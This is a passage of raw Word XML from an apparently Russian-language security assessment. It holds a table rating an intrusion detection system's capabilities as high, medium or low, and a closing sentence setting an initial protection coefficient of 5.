              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="382DE161"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Высокий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="532C18CF"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Средний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC09D7B"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Низкий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4166612F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="4B496454" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31D0F03C"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Детекция известных атак с чёткими сигнатурами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="379CFD99"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1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB99B38" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17847582" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9CBE9D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="43329A5F" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599AB571"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Выявление сетевых аномалий и неизвестных угроз</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F2FA278"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1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01789716" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A48D108"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222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2687CF90" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="141A6528" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="692"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0759028C"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xml:space="preserve">Обнаружение сложных многоэтапных атак </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CC37059"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1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70BA0F13"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE138C6"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222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="574BDAEC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="37C5957E" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="545"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53A765B4" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5"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AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Снижение ложных срабатываний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F590BE"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1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BEA783"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672D01F0"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222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B03A9E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="35D0DB43" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="784"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3204D14D"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Адаптивность к изменению поведения угроз</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DDE383B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512037A7"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1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C03E433"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222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C564CE6" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="25F7A1BB" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="734"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28786CA9"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Мониторинг и защита служебных каналов управления СОВ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EED68A3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D3F580"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1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="327E29DC"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222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D18A827" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="1CECA066" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="971"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28045A4D"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Контроль целостности и доступности журналов аудита</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A090DDE"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1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5865EBF1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591964C6" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF2AF5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3BF32B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66690232" w14:textId="77777777" w:rsidR="00B93B26" w:rsidRDefault="00B93B26" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E7992F" w14:textId="34D83B55" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004360CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>На основании представленной оценки, где преобладают низкие и средние уровни защищённости, а способность системы к адаптивному реагированию на современные угрозы ограничена, коэффициент исходной защищённости принимается равным Y</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2212">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004360CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004360CF">
        <w:rPr>
